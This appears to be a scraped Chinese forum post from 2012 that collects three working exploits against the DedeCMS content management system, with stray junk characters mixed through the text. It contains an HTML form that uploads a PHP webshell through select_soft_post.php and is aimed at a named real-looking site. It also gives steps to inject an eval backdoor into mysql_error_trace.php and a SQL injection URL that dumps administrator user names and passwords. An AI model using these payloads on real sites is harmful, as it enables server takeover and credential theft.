! n2 P% z3 f- r织梦(Dedecms)select_soft_post.php页面变量未初始漏洞: d5 j" M/ \6 E: x
<html>) `/ @' J. H1 {; q' |; b, I1 d
<head>0 m& k. \5 m6 u4 i w [
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
8 r- H; y6 n8 U6 e q. p7 {) i</head>
5 ]: F: R7 l/ y3 w* T<body style="FONT-SIZE: 9pt">
+ Y8 d# `7 S1 h2 K3 b: Z---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
6 Q- Z) x- G( E, }2 h8 @7 L0 I<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
3 [( V3 n P( _) D) G<input type='hidden' name='activepath' value='/data/cache/' />, ?& [1 y. k4 ?3 V+ X K* q& U" l& }
<input type='hidden' name='cfg_basedir' value='../../' />
* [/ X3 w% S3 c. P5 v<input type='hidden' name='cfg_imgtype' value='php' />
2 k. G3 N& ?& t+ C2 U& @<input type='hidden' name='cfg_not_allowall' value='txt' />5 l0 e' i/ w4 @. N* k4 W. u9 q
<input type='hidden' name='cfg_softtype' value='php' />5 ~3 z& J6 w+ ?1 R. k8 q2 {; ?1 O
<input type='hidden' name='cfg_mediatype' value='php' />% L! s2 c* C5 v" q
<input type='hidden' name='f' value='form1.enclosure' /> x) H4 r$ i7 o8 Y" H- [& p$ n/ \
<input type='hidden' name='job' value='upload' />
. ?# A' P! o. ?( G c% q7 L<input type='hidden' name='newname' value='fly.php' />
. V% o! r0 w% ASelect U Shell <input type='file' name='uploadfile' size='25' />
2 ^: e) i& J: K: i0 |<input type='submit' name='sb1' value='确定' />
) q V: z$ Z; P; A) Y. F</form>% j7 V! Y: e- D% ^2 _
<br />It's just a exp for the bug of Dedecms V55...<br />% S6 ?# s s: s0 b& I
Need register_globals = on...<br />
, N2 H; n% N! a6 k4 p8 kFun the game,get a webshell at /data/cache/fly.php...<br />
1 U, w& b# N. K# ?2 V+ i7 q</body>% Q+ R8 |4 ]( ^5 u* }
</html>
4 D/ e0 w' O6 N0 n
9 ~( @4 ?8 {. E$ T; R5 q% Y: u/ e2 y: d
% R' j7 B' m! C6 X9 C- g! b
' `# Z' Z) D8 |+ d6 ^7 }1 L* c- E/ b) w3 n
2 z: L9 |0 B% r F% D1 |
% m+ B' |2 }, {7 {- w- @, r# U
' Q5 l9 k0 ^3 T* x- u! c) T. X6 i6 v4 v% T" d
! b4 z) Q$ d# D2 ?0 _0 [# ~, x
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞9 s9 O! A* q' n6 L; Q% y( m
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
' w$ ~" R* A& F! n% ]% Y4 w1. 访问网址:' H& E5 w2 Y3 R
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
1 w+ E# T. S" ^' `' P, Y( t可看见错误信息
7 z+ S5 X1 x4 a& ~- i" r& f a! _1 u, C- o
, o. v1 z$ {; c! C9 O' ?
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。. Z$ u+ y+ _3 N9 a, k1 @5 W
int(3) Error: Illegal double '1024e1024' value found during parsing- r* l5 r% n' O; \7 U7 L
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
+ T! P; A9 ~7 U: o6 S9 U, l% e; J" L2 _
) m2 U+ K3 l. o4 q! ?
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
; R" D2 r6 y3 q- r3 Q1 f! C v- H7 F, X Y$ W9 u% }0 L2 t& L
8 c* E, w- s; ~+ T6 [1 C8 f* M" X<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>/ d+ i. V: H; c- q I1 p
) W1 Q) h8 P9 \$ ~* V+ M) L5 N
) f& l, b9 c7 Z& U9 m# n) u; y按确定后的看到第2步骤的信息表示文件木马上传成功.
# H3 s7 | _6 w
+ b% F- L5 `, M" I O1 A! n% K& B! M# F# Z$ _$ G
+ r; Z% i ]" @& D: I( ~
# R: {* {: F c4 F6 t0 V' Q
$ B( K& y8 Q( R$ E5 E+ T* |
$ S3 H, w# C% S2 `' d! n
5 T" K+ ]1 X" u, B) M& d% W( X- s* F. o6 Q% V' B, J/ b
( v' S+ U3 l5 m3 ?! Q
4 y5 U. U$ J1 n K# d
# x; ?; ]: d: j, K! n7 E3 L9 E$ }3 k" M, t% \; m! g4 B2 Z, r" Q
织梦(DedeCms)plus/infosearch.php 文件注入漏洞) R$ c1 c; M1 j2 m4 y7 R
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对